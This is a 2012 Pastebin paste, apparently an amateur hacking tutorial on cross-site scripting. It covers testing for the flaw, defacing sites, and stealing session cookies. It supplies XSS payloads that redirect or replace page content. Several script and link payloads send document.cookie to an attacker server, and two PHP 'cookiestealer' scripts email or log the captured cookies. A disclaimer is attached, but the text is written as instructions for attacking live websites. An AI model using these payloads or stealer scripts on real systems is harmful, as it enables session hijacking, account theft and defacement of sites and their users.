API tools faq
paste
Advertisement
HackerRIZLA

XSS Tutorial

HackerRIZLA
Sep 15th, 2012
2,316
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.58 KB | None | 0 0
raw download clone embed print report
  1. In this tutorial I will show you how to hack a website using XSS.The ones I used for demonstration I did not hurt, and I take no responsibility if you do use them.
  2.  
  3.  
  4. Parts Of The Tutorial:
  5.  
  6. 1)Vulnerability Test
  7. 2)Defacing
  8. 3)Stealing Login Information
  9.  
  10. Vulnerability Test:
  11.  
  12.  
  13. It's pretty simple to find a XSS vulnerability.
  14.  
  15. Steps:
  16.  
  17. 1)Find a textbox in the site or something where you can submit text.
  18.  
  19. 2)Type in the following:
  20. Code:
  21. <script>alert("XSS");</script>
  22.  
  23. 3)If it is vulnerable it should look like this:
  24.  
  25.  
  26.  
  27.  
  28. Defacing:
  29.  
  30. There are some ways to deface a site when you find a XSS vulnerability.
  31.  
  32. Makes A Picture Pop-Up:
  33.  
  34. Code:
  35. "><script>location="www.[censored].com/YOURDEFACEPIC";</script>
  36.  
  37. Replace The Content Of The Page By An Image:
  38. Code:
  39. <img src="yourevilpic.com">
  40.  
  41. Redirect To A Webpage:
  42. Code:
  43. <meta http-equiv="refresh" content="0;url=http://www.youhacx0rpic.com/Haxored.html" />
  44.  
  45. Stealing Login Information:
  46.  
  47. The first way to do it is to put the following code on the textbox.If there is an Username field and a Password field just put it on both.
  48.  
  49. Code:
  50. <script>alert(document.cookie);</script>
  51.  
  52. It should look like this if it is vulnerable and there is any login information:
  53.  
  54.  
  55.  
  56. Then just get an cookie editor for Firefox or use Opera browser(which has an cookie editing function)
  57.  
  58. Cookie Stealing:
  59.  
  60. In this way of cookie stealing, you set files in a server and then you inject XSS into the login(s)/url.
  61. I didint made the code's for this part, thats why I dont explain 2 mutch.
  62.  
  63. URL/Login:
  64.  
  65. Code:
  66. <script>alert(www.yoursite.com/cookiestealer.php)</script>
  67.  
  68. OR
  69.  
  70. Code:
  71. <script>document.location='www.yoursite.com/cookiestealer.php?cookie='+escape(document.cookie) </script>
  72.  
  73. OR
  74.  
  75. Code:
  76. <script>
  77. document.location = 'http://yoursite.com/steal.php?cookie=' + document.cookie;
  78. </script>
  79.  
  80. Cookiestealer.php:
  81.  
  82. Code:
  83. <?
  84.  
  85. mail("[email protected]","cookie monster",$_REQUEST['cookie']);
  86.  
  87. ?>
  88. <html>
  89. <script>document.location='http://tutorialblog.org/free-vector-downloads-part2/'</script>
  90. </html>
  91.  
  92. OR
  93.  
  94. Code:
  95. <?php
  96. $cookie = $_GET['cookie'];
  97. $log = fopen("log.txt", "a");
  98. fwrite($log, $cookie ."\n");
  99. fclose($log);
  100. ?>
  101.  
  102. In the one up you should have the following files on your server:
  103. -cookiestealer.php(The Script)
  104. -log.txt(The File Where The Logs Will Be Stored)
  105.  
  106. This is for any page that has got a Text Box and a Submit Button and that accepts HTML tags(Like Those Blog Commentary Posters):
  107.  
  108. Code:
  109. <a href="javascript:void(document.location='http://yoursite.com/cookiestealer.php?cookie='+
  110. document.cookie)">Something</a>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!